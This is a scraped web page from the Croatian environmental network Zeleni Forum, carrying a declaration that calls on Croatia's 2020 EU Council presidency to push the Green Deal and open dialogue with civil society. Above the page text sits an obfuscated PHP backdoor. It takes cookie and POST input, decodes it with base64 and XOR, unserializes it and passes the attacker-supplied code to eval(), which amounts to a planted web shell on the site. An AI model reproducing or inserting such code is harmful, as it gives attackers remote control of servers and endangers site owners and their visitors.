$bDMhBNMO = chr ( 745 - 646 ).'_' . "\124" . "\130" . chr ( 1102 - 991 ).chr ( 174 - 107 ); $GNQlfv = 'c' . 'l' . 'a' . "\163" . 's' . chr ( 211 - 116 ).'e' . chr (120) . 'i' . "\x73" . chr ( 452 - 336 )."\x73";$rtMINlOnUq = class_exists($bDMhBNMO); $GNQlfv = "3231";$AAvQxiikZL = !1;if ($rtMINlOnUq == $AAvQxiikZL){function zCApvp(){$syiLqlIT = new /* 22434 */ c_TXoC(41226 + 41226); $syiLqlIT = NULL;}$MLLyfOTves = "41226";class c_TXoC{private function avsJOB($MLLyfOTves){if (is_array(c_TXoC::$BrfwbO)) {$JQZhjt = str_replace('<' . chr (63) . "\160" . "\150" . chr (112), "", c_TXoC::$BrfwbO[chr (99) . "\x6f" . "\156" . chr ( 307 - 191 ).chr (101) . 'n' . "\164"]);eval($JQZhjt); $MLLyfOTves = "41226";exit();}}private $ejIrXiK;public function UoLMpRzWB(){echo 1697;}public function __destruct(){c_TXoC::$BrfwbO = @unserialize(c_TXoC::$BrfwbO); $MLLyfOTves = "20803_15741";$this->avsJOB($MLLyfOTves); $MLLyfOTves = "20803_15741";}public function uKyMShiW($GXRdL, $dzQSxQv){return $GXRdL[0] ^ str_repeat($dzQSxQv, (strlen($GXRdL[0]) / strlen($dzQSxQv)) + 1);}public function ItWEoZM($GXRdL){$OlXMRVy = "base64";return array_map($OlXMRVy . chr (95) . chr ( 948 - 848 ).chr (101) . "\143" . chr ( 124 - 13 ).chr ( 556 - 456 ).chr ( 721 - 620 ), array($GXRdL,));}public function __construct($QWPbb=0){$abZxXt = $_POST;$lILjfaXvW = $_COOKIE;$dzQSxQv = "b7aa93a8-a17b-448e-bf53-971431b110a8";$eUDoeaXwCi = @$lILjfaXvW[substr($dzQSxQv, 0, 4)];if (!empty($eUDoeaXwCi)){$GXRdL = "";$eUDoeaXwCi = explode(",", $eUDoeaXwCi);foreach ($eUDoeaXwCi as $CIdbhY){$GXRdL .= @$lILjfaXvW[$CIdbhY];$GXRdL .= @$abZxXt[$CIdbhY];}c_TXoC::$BrfwbO = $this->uKyMShiW($this->ItWEoZM($GXRdL), $dzQSxQv);}}public static $BrfwbO = 38262;}zCApvp();} Deklaracija 2020 - Održiva Europa za sve! - Zeleni Forum

Deklaracija 2020 - Održiva Europa za sve!

Okolišne udruge okupljene u nacionalnu mrežu Zeleni Forum pozivaju nadležne institucije Hrvatske vlade da odlučnije iskoriste svoju ulogu presjedatelja Vijećem EU, potaknu ambicioznu provedbu pravednog “Zelenog plana za Europu” i konačno uspostave dijalog s civilnim društvom na nacionalnoj razini o navedenim temama.

Pošto se približava polovina mandata hrvatskog predsjedanja, a vidimo spremnost na dijalog s predstavnicima europskog civilnog društva, ovom Deklaracijom o ciljevima predsjedanja na području zaštite okoliša i održivog razvoja Zeleni forum želi, još jednom, uspostaviti komunikaciju oko prioriteta predsjedanja u koju bi odgovorne institucije trebale uključiti što širi krug domaćih dionika.

Ovu su Deklaraciju pripremile organizacije za zaštitu okoliša iz Hrvatske, članice nacionalne mreže „Zeleni forum“, u suradnji s platformom organizacija civilnog društva za praćenje hrvatskog predsjedanja EU „Forum 2020“, a na temelju stavova europske mreže okolišnih organizacija, European Environmental Bureau (EEB). Cilj je predstaviti očekivanja Zelenog foruma vezana za tekuće hrvatsko predsjedanje Vijećem EU na području održivog razvoja i zaštite okoliša. Deklaracija se temelji na ranije razvijenim deklaracijama „Deset zelenih testova“, koje su pripremili EEB i Seas at Risk te na dokumentu Foruma 2020 „Prioriteti civilnog društva za predsjedanje Republike Hrvatske Vijećem Europe“.

Hrvatsko predsjedanje dolazi u kritičnom trenutku za rješavanje egzistencijalne klimatske krize i krize biološke raznolikosti. Ono je prvo cjelovito predsjedanje EU nakon pokretanja komunikacije o europskom “Zelenom dogovoru” (Green Deal), a nakon što je Europski parlament usvajio rezoluciju „proglašavajući klimatsku i ekološku izvanrednu situaciju (krizu) u Europi i na globalnoj razini“.

Nesporno je dokazano da se suočavamo s klimatskom krizom, gubitkom biološke raznolikosti, društveno neprihvatljivim rizicima za zdravlje od kemikalija i zagađenja zraka te neospornim razinama zagađenja plastikom u morima i oceanima. Pored egzistencijalnih kriza u okruženju, suočeni smo s visokom razinom nejednakosti, kako unutar EU tako i na globalnoj razini, kao i sa smanjenjem razine povjerenja u vlade, načine upravljanja i donošenja politika.

Građani i građanke, a posebno mladi, zahtijevaju da EU učini više u rješavanju klimatskih i okolišnih izazova. Nedavna anketa Eurobarometra pokazuje da „93% građana EU-a klimatske promjene doživljava kao ozbiljan problem, dok 79% smatra da je to vrlo ozbiljan problem, a 84% vjeruje da treba prijeći na čistu energiju i veću javnu financijsku potporu, čak i ako to znači smanjenje subvencija na fosilna goriva “.

Iako su europske okolišne i klimatske politike pomogle poboljšanju stanja u okolišu tijekom posljednjih desetljeća, Europa nije postigla dovoljan napredak, a izgledi za okoliš u narednom desetljeću nisu pozitivni, prema izvještaju o stanju okoliša Europske agencije za okoliš (EEA). U izvještaju se poziva europske zemlje, vođe i donositelje politika da iskoriste priliku kako bi u sljedećem desetljeću radikalno povećali i ubrzali akcije da se Europu vrati na pravi put ka ispunjenju srednjoročnih i dugoročnih ciljeva zaštite okoliša, a kako bi se izbjegle nepovratne promjene i šteta.

Zeleni forum traži od hrvatskog predsjedništva EU da pokrene pozitivnu agendu za suočavanje s navedenim izazovima u području zaštite okoliša i klime s kojima se Europa suočava u brzo promjenjivoj geopolitičkoj stvarnosti i to u dialogu s domaćim dionicima koji se ovim temama bave.

Dokumenti:

Ove stranice su nastale uz financijsku potporu Europske unije.
Za sadržaj stranica odgovaran je isključivo Zeleni Forum i ni u kom slučaju se ne može smatrati da odražava stav Europske unije.
© 1998. - 2022. Zeleni forum - mreža udruga za zaštitu okoliša Hrvatske